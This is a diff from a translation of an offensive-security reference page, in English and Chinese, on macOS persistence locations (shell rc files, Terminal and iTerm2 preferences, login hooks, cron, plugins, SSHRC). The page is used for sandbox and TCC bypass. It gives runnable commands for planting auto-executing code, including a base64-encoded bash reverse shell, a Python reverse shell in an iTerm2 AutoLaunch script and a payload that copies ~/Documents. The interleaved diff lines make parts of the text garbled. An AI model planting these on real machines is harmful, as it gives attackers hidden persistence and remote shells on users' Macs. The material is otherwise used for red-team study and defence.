=> { "IOMatchLaunchStream" => 1 ...` -- **Mach port:** - - `com.apple.xscertd-helper.plist`: It's indicating in the `MachServices` entry the name `com.apple.xscertd.helper` -- **UserEventAgent:** - - This is different from the previous one. It makes launchd spawn apps in response to specific event. However, in this case, the main binary involved isn't `launchd` but `/usr/libexec/UserEventAgent`. It loads plugins from the SIP restricted folder /System/Library/UserEventPlugins/ where each plugin indicates its initialiser in the `XPCEventModuleInitializer` key or. in the case of older plugins, in the `CFPluginFactories` dict under the key `FB86416D-6164-2070-726F-70735C216EC0` of its `Info.plist`. +- **基于时间执行的定时守护进程**: +- atd (`com.apple.atrun.plist`): 有一个 `StartInterval` 为 30 分钟 +- crond (`com.apple.systemstats.daily.plist`): 有 `StartCalendarInterval` 在 00:15 启动 +- **网络守护进程**,例如: +- `org.cups.cups-lpd`: 在 TCP (`SockType: stream`) 上监听,`SockServiceName: printer` +- SockServiceName 必须是 `/etc/services` 中的端口或服务 +- `com.apple.xscertd.plist`: 在 TCP 端口 1640 上监听 +- **路径守护进程**,在指定路径更改时执行: +- `com.apple.postfix.master`: 检查路径 `/etc/postfix/aliases` +- **IOKit 通知守护进程**: +- `com.apple.xartstorageremoted`: `"com.apple.iokit.matching" => { "com.apple.device-attach" => { "IOMatchLaunchStream" => 1 ...` +- **Mach 端口:** +- `com.apple.xscertd-helper.plist`: 在 `MachServices` 条目中指示名称 `com.apple.xscertd.helper` +- **UserEventAgent:** +- 这与前一个不同。它使 launchd 在响应特定事件时生成应用程序。然而,在这种情况下,涉及的主要二进制文件不是 `launchd`,而是 `/usr/libexec/UserEventAgent`。它从 SIP 受限文件夹 /System/Library/UserEventPlugins/ 加载插件,每个插件在 `XPCEventModuleInitializer` 键中指示其初始化程序,或者在旧插件的情况下,在其 `Info.plist` 的 `FB86416D-6164-2070-726F-70735C216EC0` 键下的 `CFPluginFactories` 字典中。 -### shell startup files +### shell 启动文件 Writeup: [https://theevilbit.github.io/beyond/beyond_0001/](https://theevilbit.github.io/beyond/beyond_0001/)\ Writeup (xterm): [https://theevilbit.github.io/beyond/beyond_0018/](https://theevilbit.github.io/beyond/beyond_0018/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC Bypass: [✅](https://emojipedia.org/check-mark-button) - - But you need to find an app with a TCC bypass that executes a shell that loads these files +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- 但你需要找到一个具有 TCC 绕过的应用程序,该应用程序执行一个加载这些文件的 shell -#### Locations +#### 位置 - **`~/.zshrc`, `~/.zlogin`, `~/.zshenv.zwc`**, **`~/.zshenv`, `~/.zprofile`** - - **Trigger**: Open a terminal with zsh +- **触发**: 打开一个 zsh 终端 - **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`** - - **Trigger**: Open a terminal with zsh - - Root required +- **触发**: 打开一个 zsh 终端 +- 需要 root 权限 - **`~/.zlogout`** - - **Trigger**: Exit a terminal with zsh +- **触发**: 退出一个 zsh 终端 - **`/etc/zlogout`** - - **Trigger**: Exit a terminal with zsh - - Root required -- Potentially more in: **`man zsh`** +- **触发**: 退出一个 zsh 终端 +- 需要 root 权限 +- 可能还有更多在: **`man zsh`** - **`~/.bashrc`** - - **Trigger**: Open a terminal with bash -- `/etc/profile` (didn't work) -- `~/.profile` (didn't work) +- **触发**: 打开一个 bash 终端 +- `/etc/profile` (未能工作) +- `~/.profile` (未能工作) - `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/` - - **Trigger**: Expected to trigger with xterm, but it **isn't installed** and even after installed this error is thrown: xterm: `DISPLAY is not set` +- **触发**: 预计在 xterm 中触发,但它 **未安装**,即使安装后也会抛出此错误: xterm: `DISPLAY is not set` -#### Description & Exploitation +#### 描述与利用 -When initiating a shell environment such as `zsh` or `bash`, **certain startup files are run**. macOS currently uses `/bin/zsh` as the default shell. This shell is automatically accessed when the Terminal application is launched or when a device is accessed via SSH. While `bash` and `sh` are also present in macOS, they need to be explicitly invoked to be used. - -The man page of zsh, which we can read with **`man zsh`** has a long description of the startup files. +当启动一个 shell 环境,如 `zsh` 或 `bash` 时,**会运行某些启动文件**。macOS 当前使用 `/bin/zsh` 作为默认 shell。当启动终端应用程序或通过 SSH 访问设备时,自动访问此 shell。虽然 `bash` 和 `sh` 也存在于 macOS 中,但需要明确调用才能使用。 +zsh 的手册页,我们可以通过 **`man zsh`** 阅读,详细描述了启动文件。 ```bash # Example executino via ~/.zshrc echo "touch /tmp/hacktricks" >> ~/.zshrc ``` - -### Re-opened Applications +### 重新打开的应用程序 > [!CAUTION] -> Configuring the indicated exploitation and loging-out and loging-in or even rebooting didn't work for me to execute the app. (The app wasn't being executed, maybe it needs to be running when these actions are performed) +> 配置所指示的利用和注销再登录或甚至重启对我执行应用程序没有效果。(应用程序没有被执行,也许在执行这些操作时需要它正在运行) -**Writeup**: [https://theevilbit.github.io/beyond/beyond_0021/](https://theevilbit.github.io/beyond/beyond_0021/) +**写作**: [https://theevilbit.github.io/beyond/beyond_0021/](https://theevilbit.github.io/beyond/beyond_0021/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - **`~/Library/Preferences/ByHost/com.apple.loginwindow..plist`** - - **Trigger**: Restart reopening applications +- **触发**: 重启重新打开应用程序 -#### Description & Exploitation +#### 描述与利用 -All the applications to reopen are inside the plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist` +所有要重新打开的应用程序都在 plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist` 中 -So, make the reopen applications launch your own one, you just need to **add your app to the list**. +因此,要使重新打开的应用程序启动您自己的应用程序,您只需 **将您的应用程序添加到列表中**。 -The UUID can be found listing that directory or with `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` - -To check the applications that will be reopened you can do: +UUID 可以通过列出该目录或使用 `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` 找到 +要检查将要重新打开的应用程序,您可以执行: ```bash defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin #or plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow..plist ``` - -To **add an application to this list** you can use: - +要**将应用程序添加到此列表**,您可以使用: ```bash # Adding iTerm2 /usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \ - -c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \ - -c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \ - -c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \ - -c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \ - ~/Library/Preferences/ByHost/com.apple.loginwindow..plist +-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \ +-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \ +-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \ +-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \ +~/Library/Preferences/ByHost/com.apple.loginwindow..plist ``` - ### Terminal Preferences -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC bypass: [✅](https://emojipedia.org/check-mark-button) - - Terminal use to have FDA permissions of the user use it +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- 终端使用用户的 FDA 权限 #### Location - **`~/Library/Preferences/com.apple.Terminal.plist`** - - **Trigger**: Open Terminal +- **Trigger**: 打开终端 #### Description & Exploitation -In **`~/Library/Preferences`** are store the preferences of the user in the Applications. Some of these preferences can hold a configuration to **execute other applications/scripts**. +在 **`~/Library/Preferences`** 中存储用户在应用程序中的偏好设置。这些偏好设置中的一些可以包含 **执行其他应用程序/脚本** 的配置。 -For example, the Terminal can execute a command in the Startup: +例如,终端可以在启动时执行一个命令:
-This config is reflected in the file **`~/Library/Preferences/com.apple.Terminal.plist`** like this: - +此配置在文件 **`~/Library/Preferences/com.apple.Terminal.plist`** 中反映如下: ```bash [...] "Window Settings" => { - "Basic" => { - "CommandString" => "touch /tmp/terminal_pwn" - "Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf } - "FontAntialias" => 1 - "FontWidthSpacing" => 1.004032258064516 - "name" => "Basic" - "ProfileCurrentVersion" => 2.07 - "RunCommandAsShell" => 0 - "type" => "Window Settings" - } +"Basic" => { +"CommandString" => "touch /tmp/terminal_pwn" +"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf } +"FontAntialias" => 1 +"FontWidthSpacing" => 1.004032258064516 +"name" => "Basic" +"ProfileCurrentVersion" => 2.07 +"RunCommandAsShell" => 0 +"type" => "Window Settings" +} [...] ``` +所以,如果系统中终端的偏好设置的plist可以被覆盖,那么**`open`**功能可以用来**打开终端并执行该命令**。 -So, if the plist of the preferences of the terminal in the system could be overwritten, the the **`open`** functionality can be used to **open the terminal and that command will be executed**. - -You can add this from the cli with: - +你可以通过cli添加这个: ```bash # Add /usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist @@ -245,24 +232,22 @@ You can add this from the cli with: # Remove /usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist ``` +### Terminal Scripts / 其他文件扩展名 -### Terminal Scripts / Other file extensions +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- 终端使用用户的 FDA 权限 -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC bypass: [✅](https://emojipedia.org/check-mark-button) - - Terminal use to have FDA permissions of the user use it +#### 位置 -#### Location +- **任何地方** +- **触发**: 打开终端 -- **Anywhere** - - **Trigger**: Open Terminal +#### 描述与利用 -#### Description & Exploitation - -If you create a [**`.terminal`** script](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) and opens, the **Terminal application** will be automatically invoked to execute the commands indicated in there. If the Terminal app has some special privileges (such as TCC), your command will be run with those special privileges. - -Try it with: +如果你创建一个 [**`.terminal`** 脚本](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) 并打开,**终端应用程序**将自动调用以执行其中指示的命令。如果终端应用程序具有某些特殊权限(例如 TCC),你的命令将以这些特殊权限运行。 +尝试使用: ```bash # Prepare the payload cat > /tmp/test.terminal << EOF @@ -270,16 +255,16 @@ cat > /tmp/test.terminal << EOF - CommandString - mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents; - ProfileCurrentVersion - 2.0600000000000001 - RunCommandAsShell - - name - exploit - type - Window Settings +CommandString +mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents; +ProfileCurrentVersion +2.0600000000000001 +RunCommandAsShell + +name +exploit +type +Window Settings EOF @@ -290,48 +275,47 @@ open /tmp/test.terminal # Use something like the following for a reverse shell: echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash; ``` - -You could also use the extensions **`.command`**, **`.tool`**, with regular shell scripts content and they will be also opened by Terminal. +您还可以使用扩展名 **`.command`**、**`.tool`**,与常规的 shell 脚本内容,它们也会被终端打开。 > [!CAUTION] -> If terminal has **Full Disk Access** it will be able to complete that action (note that the command executed will be visible in a terminal window). +> 如果终端具有 **完全磁盘访问权限**,它将能够完成该操作(请注意,执行的命令将在终端窗口中可见)。 -### Audio Plugins +### 音频插件 -Writeup: [https://theevilbit.github.io/beyond/beyond_0013/](https://theevilbit.github.io/beyond/beyond_0013/)\ -Writeup: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882) +写作: [https://theevilbit.github.io/beyond/beyond_0013/](https://theevilbit.github.io/beyond/beyond_0013/)\ +写作: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - - You might get some extra TCC access +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [🟠](https://emojipedia.org/large-orange-circle) +- 您可能会获得一些额外的 TCC 访问权限 -#### Location +#### 位置 - **`/Library/Audio/Plug-Ins/HAL`** - - Root required - - **Trigger**: Restart coreaudiod or the computer +- 需要 root 权限 +- **触发**:重启 coreaudiod 或计算机 - **`/Library/Audio/Plug-ins/Components`** - - Root required - - **Trigger**: Restart coreaudiod or the computer +- 需要 root 权限 +- **触发**:重启 coreaudiod 或计算机 - **`~/Library/Audio/Plug-ins/Components`** - - **Trigger**: Restart coreaudiod or the computer +- **触发**:重启 coreaudiod 或计算机 - **`/System/Library/Components`** - - Root required - - **Trigger**: Restart coreaudiod or the computer +- 需要 root 权限 +- **触发**:重启 coreaudiod 或计算机 -#### Description +#### 描述 -According to the previous writeups it's possible to **compile some audio plugins** and get them loaded. +根据之前的写作,可以 **编译一些音频插件** 并使其加载。 -### QuickLook Plugins +### QuickLook 插件 -Writeup: [https://theevilbit.github.io/beyond/beyond_0028/](https://theevilbit.github.io/beyond/beyond_0028/) +写作: [https://theevilbit.github.io/beyond/beyond_0028/](https://theevilbit.github.io/beyond/beyond_0028/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - - You might get some extra TCC access +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [🟠](https://emojipedia.org/large-orange-circle) +- 您可能会获得一些额外的 TCC 访问权限 -#### Location +#### 位置 - `/System/Library/QuickLook` - `/Library/QuickLook` @@ -339,29 +323,28 @@ Writeup: [https://theevilbit.github.io/beyond/beyond_0028/](https://theevilbit.g - `/Applications/AppNameHere/Contents/Library/QuickLook/` - `~/Applications/AppNameHere/Contents/Library/QuickLook/` -#### Description & Exploitation +#### 描述与利用 -QuickLook plugins can be executed when you **trigger the preview of a file** (press space bar with the file selected in Finder) and a **plugin supporting that file type** is installed. +当您 **触发文件的预览**(在 Finder 中选择文件后按空格键)并且安装了 **支持该文件类型的插件** 时,可以执行 QuickLook 插件。 -It's possible to compile your own QuickLook plugin, place it in one of the previous locations to load it and then go to a supported file and press space to trigger it. +可以编译您自己的 QuickLook 插件,将其放置在上述位置之一以加载,然后转到支持的文件并按空格键以触发它。 -### ~~Login/Logout Hooks~~ +### ~~登录/注销钩子~~ > [!CAUTION] -> This didn't work for me, neither with the user LoginHook nor with the root LogoutHook +> 这对我不起作用,无论是用户 LoginHook 还是 root LogoutHook -**Writeup**: [https://theevilbit.github.io/beyond/beyond_0022/](https://theevilbit.github.io/beyond/beyond_0022/) +**写作**: [https://theevilbit.github.io/beyond/beyond_0022/](https://theevilbit.github.io/beyond/beyond_0022/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 -- You need to be able to execute something like `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` - - `Lo`cated in `~/Library/Preferences/com.apple.loginwindow.plist` - -They are deprecated but can be used to execute commands when a user logs in. +- 您需要能够执行类似 `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` 的命令 +- 位于 `~/Library/Preferences/com.apple.loginwindow.plist` +它们已被弃用,但可以在用户登录时执行命令。 ```bash cat > $HOME/hook.sh << EOF #!/bin/bash @@ -371,97 +354,85 @@ chmod +x $HOME/hook.sh defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh ``` - -This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` - +此设置存储在 `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` ```bash defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist { - LoginHook = "/Users/username/hook.sh"; - LogoutHook = "/Users/username/hook.sh"; - MiniBuddyLaunch = 0; - TALLogoutReason = "Shut Down"; - TALLogoutSavesState = 0; - oneTimeSSMigrationComplete = 1; +LoginHook = "/Users/username/hook.sh"; +LogoutHook = "/Users/username/hook.sh"; +MiniBuddyLaunch = 0; +TALLogoutReason = "Shut Down"; +TALLogoutSavesState = 0; +oneTimeSSMigrationComplete = 1; } ``` - -To delete it: - +要删除它: ```bash defaults delete com.apple.loginwindow LoginHook defaults delete com.apple.loginwindow LogoutHook ``` +根用户的一个存储在 **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** -The root user one is stored in **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** - -## Conditional Sandbox Bypass +## 条件沙箱绕过 > [!TIP] -> Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** and **expecting not super common conditions** like specific **programs installed, "uncommon" user** actions or environments. +> 在这里您可以找到对 **沙箱绕过** 有用的启动位置,允许您通过 **将其写入文件** 并 **期望不太常见的条件**,如特定的 **已安装程序**、"不常见" 用户 **操作** 或环境,简单地执行某些内容。 ### Cron -**Writeup**: [https://theevilbit.github.io/beyond/beyond_0004/](https://theevilbit.github.io/beyond/beyond_0004/) +**写作**: [https://theevilbit.github.io/beyond/beyond_0004/](https://theevilbit.github.io/beyond/beyond_0004/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - However, you need to be able to execute `crontab` binary - - Or be root -- TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +- 有助于绕过沙箱: [✅](https://emojipedia.org/check-mark-button) +- 但是,您需要能够执行 `crontab` 二进制文件 +- 或者是根用户 +- TCC 绕过: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### 位置 - **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`** - - Root required for direct write access. No root required if you can execute `crontab ` - - **Trigger**: Depends on the cron job +- 直接写入访问需要根权限。如果您可以执行 `crontab `,则不需要根权限 +- **触发**: 取决于 cron 作业 -#### Description & Exploitation - -List the cron jobs of the **current user** with: +#### 描述与利用 +列出 **当前用户** 的 cron 作业: ```bash crontab -l ``` +您还可以在 **`/usr/lib/cron/tabs/`** 和 **`/var/at/tabs/`** 中查看所有用户的 cron 作业(需要 root 权限)。 -You can also see all the cron jobs of the users in **`/usr/lib/cron/tabs/`** and **`/var/at/tabs/`** (needs root). - -In MacOS several folders executing scripts with **certain frequency** can be found in: - +在 MacOS 中,可以在以下位置找到几个以 **特定频率** 执行脚本的文件夹: ```bash # The one with the cron jobs is /usr/lib/cron/tabs/ ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/ ``` +您可以找到常规的 **cron** **作业**、**at** **作业**(不常用)和 **周期性** **作业**(主要用于清理临时文件)。每日周期性作业可以通过以下方式执行,例如:`periodic daily`。 -There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`. - -To add a **user cronjob programatically** it's possible to use: - +要以编程方式添加 **用户 cronjob**,可以使用: ```bash echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron crontab /tmp/cron ``` - ### iTerm2 Writeup: [https://theevilbit.github.io/beyond/beyond_0002/](https://theevilbit.github.io/beyond/beyond_0002/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -- TCC bypass: [✅](https://emojipedia.org/check-mark-button) - - iTerm2 use to have granted TCC permissions +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- iTerm2 曾经拥有授予的 TCC 权限 -#### Locations +#### 位置 - **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** - - **Trigger**: Open iTerm +- **触发器**: 打开 iTerm - **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** - - **Trigger**: Open iTerm +- **触发器**: 打开 iTerm - **`~/Library/Preferences/com.googlecode.iterm2.plist`** - - **Trigger**: Open iTerm +- **触发器**: 打开 iTerm -#### Description & Exploitation - -Scripts stored in **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** will be executed. For example: +#### 描述与利用 +存储在 **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** 中的脚本将被执行。例如: ```bash cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF #!/bin/bash @@ -470,52 +441,44 @@ EOF chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" ``` - -or: - +或: ```bash cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF #!/usr/bin/env python3 import iterm2,socket,subprocess,os async def main(connection): - s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']); - async with iterm2.CustomControlSequenceMonitor( - connection, "shared-secret", r'^create-window$') as mon: - while True: - match = await mon.async_get() - await iterm2.Window.async_create(connection) +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']); +async with iterm2.CustomControlSequenceMonitor( +connection, "shared-secret", r'^create-window$') as mon: +while True: +match = await mon.async_get() +await iterm2.Window.async_create(connection) iterm2.run_forever(main) EOF ``` - -The script **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** will also be executed: - +脚本 **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** 也将被执行: ```bash do shell script "touch /tmp/iterm2-autolaunchscpt" ``` +iTerm2 的偏好设置位于 **`~/Library/Preferences/com.googlecode.iterm2.plist`** 可以 **指示在打开 iTerm2 终端时执行的命令**。 -The iTerm2 preferences located in **`~/Library/Preferences/com.googlecode.iterm2.plist`** can **indicate a command to execute** when the iTerm2 terminal is opened. - -This setting can be configured in the iTerm2 settings: +此设置可以在 iTerm2 设置中配置:
-And the command is reflected in the preferences: - +该命令在偏好设置中反映: ```bash plutil -p com.googlecode.iterm2.plist { - [...] - "New Bookmarks" => [ - 0 => { - [...] - "Initial Text" => "touch /tmp/iterm-start-command" +[...] +"New Bookmarks" => [ +0 => { +[...] +"Initial Text" => "touch /tmp/iterm-start-command" ``` - -You can set the command to execute with: - +您可以设置要执行的命令为: ```bash # Add /usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist @@ -526,28 +489,26 @@ open /Applications/iTerm.app/Contents/MacOS/iTerm2 # Remove /usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist ``` - > [!WARNING] -> Highly probable there are **other ways to abuse the iTerm2 preferences** to execute arbitrary commands. +> 很可能还有 **其他方法可以滥用 iTerm2 偏好设置** 来执行任意命令。 ### xbar Writeup: [https://theevilbit.github.io/beyond/beyond_0007/](https://theevilbit.github.io/beyond/beyond_0007/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But xbar must be installed -- TCC bypass: [✅](https://emojipedia.org/check-mark-button) - - It requests Accessibility permissions +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但必须安装 xbar +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- 它请求辅助功能权限 -#### Location +#### 位置 - **`~/Library/Application\ Support/xbar/plugins/`** - - **Trigger**: Once xbar is executed +- **触发**: 一旦执行 xbar -#### Description - -If the popular program [**xbar**](https://github.com/matryer/xbar) is installed, it's possible to write a shell script in **`~/Library/Application\ Support/xbar/plugins/`** which will be executed when xbar is started: +#### 描述 +如果安装了流行程序 [**xbar**](https://github.com/matryer/xbar),可以在 **`~/Library/Application\ Support/xbar/plugins/`** 中编写一个 shell 脚本,该脚本将在启动 xbar 时执行: ```bash cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF #!/bin/bash @@ -555,110 +516,106 @@ touch /tmp/xbar EOF chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh" ``` - ### Hammerspoon **Writeup**: [https://theevilbit.github.io/beyond/beyond_0008/](https://theevilbit.github.io/beyond/beyond_0008/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But Hammerspoon must be installed -- TCC bypass: [✅](https://emojipedia.org/check-mark-button) - - It requests Accessibility permissions +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但必须安装 Hammerspoon +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- 它请求辅助功能权限 #### Location - **`~/.hammerspoon/init.lua`** - - **Trigger**: Once hammerspoon is executed +- **Trigger**: 一旦执行 hammerspoon #### Description -[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) serves as an automation platform for **macOS**, leveraging the **LUA scripting language** for its operations. Notably, it supports the integration of complete AppleScript code and the execution of shell scripts, enhancing its scripting capabilities significantly. - -The app looks for a single file, `~/.hammerspoon/init.lua`, and when started the script will be executed. +[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) 作为 **macOS** 的自动化平台,利用 **LUA 脚本语言** 进行操作。值得注意的是,它支持完整的 AppleScript 代码集成和 shell 脚本的执行,显著增强了其脚本能力。 +该应用程序查找一个文件 `~/.hammerspoon/init.lua`,并在启动时执行该脚本。 ```bash mkdir -p "$HOME/.hammerspoon" cat > "$HOME/.hammerspoon/init.lua" << EOF hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2") EOF ``` - ### BetterTouchTool -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But BetterTouchTool must be installed -- TCC bypass: [✅](https://emojipedia.org/check-mark-button) - - It requests Automation-Shortcuts and Accessibility permissions +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但必须安装 BetterTouchTool +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- 它请求自动化快捷方式和辅助功能权限 -#### Location +#### 位置 - `~/Library/Application Support/BetterTouchTool/*` -This tool allows to indicate applications or scripts to execute when some shortcuts are pressed . An attacker might be able configure his own **shortcut and action to execute in the database** to make it execute arbitrary code (a shortcut could be to just to press a key). +该工具允许指示在按下某些快捷键时执行的应用程序或脚本。攻击者可能能够在数据库中配置自己的 **快捷键和要执行的操作** 以执行任意代码(快捷键可以只是按下一个键)。 ### Alfred -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But Alfred must be installed -- TCC bypass: [✅](https://emojipedia.org/check-mark-button) - - It requests Automation, Accessibility and even Full-Disk access permissions +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但必须安装 Alfred +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- 它请求自动化、辅助功能甚至完全磁盘访问权限 -#### Location +#### 位置 - `???` -It allows to create workflows that can execute code when certain conditions are met. Potentially it's possible for an attacker to create a workflow file and make Alfred load it (it's needed to pay the premium version to use workflows). +它允许创建在满足特定条件时可以执行代码的工作流。攻击者可能能够创建一个工作流文件并使 Alfred 加载它(需要支付高级版本才能使用工作流)。 ### SSHRC Writeup: [https://theevilbit.github.io/beyond/beyond_0006/](https://theevilbit.github.io/beyond/beyond_0006/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But ssh needs to be enabled and used -- TCC bypass: [✅](https://emojipedia.org/check-mark-button) - - SSH use to have FDA access +- 有助于绕过沙盒: [✅](https://emojipedia.org/check-mark-button) +- 但需要启用并使用 ssh +- TCC 绕过: [✅](https://emojipedia.org/check-mark-button) +- SSH 需要 FDA 访问 -#### Location +#### 位置 - **`~/.ssh/rc`** - - **Trigger**: Login via ssh +- **触发器**: 通过 ssh 登录 - **`/etc/ssh/sshrc`** - - Root required - - **Trigger**: Login via ssh +- 需要 root 权限 +- **触发器**: 通过 ssh 登录 > [!CAUTION] -> To turn ssh on requres Full Disk Access: +> 启用 ssh 需要完全磁盘访问: > > ```bash > sudo systemsetup -setremotelogin on > ``` -#### Description & Exploitation +#### 描述与利用 -By default, unless `PermitUserRC no` in `/etc/ssh/sshd_config`, when a user **logins via SSH** the scripts **`/etc/ssh/sshrc`** and **`~/.ssh/rc`** will be executed. +默认情况下,除非在 `/etc/ssh/sshd_config` 中设置 `PermitUserRC no`,当用户 **通过 SSH 登录** 时,脚本 **`/etc/ssh/sshrc`** 和 **`~/.ssh/rc`** 将被执行。 -### **Login Items** +### **登录项** Writeup: [https://theevilbit.github.io/beyond/beyond_0003/](https://theevilbit.github.io/beyond/beyond_0003/) -- Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - - But you need to execute `osascript` with args -- TCC bypass: 